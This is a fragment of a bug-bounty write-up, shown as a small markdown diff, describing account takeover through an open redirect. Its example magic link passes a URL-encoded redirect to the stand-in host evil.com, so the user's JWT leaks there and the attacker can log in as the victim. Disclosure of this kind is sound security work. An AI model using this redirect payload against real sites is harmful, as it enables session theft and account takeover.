Mekkawy12/mekkawy12.github.io/OpenRedirect/Account Takeover Through Open Redirect.md

 - And the magic link sent was like this <span style="color:red">**https://program.com/logout?r=https://evil.com%252f@program.com&jwt=SOME_VALUE**</span>.
 - Clicking the link I was redirected to <span style="color:red">**https://evil.com/?https://evil.com%252f@program.com&jwt=SOME_VALUE**</span>.
 - By this, I was able to get the jwt as an attacker and using the jwt I was able to login.
 - So the same scenario is done if you want to target another user.
-You need an email after collecting the jwt you can use it to login to the user's account.
+You need an email and after collecting the jwt you can use it to login to the user's account.

 ### My Info :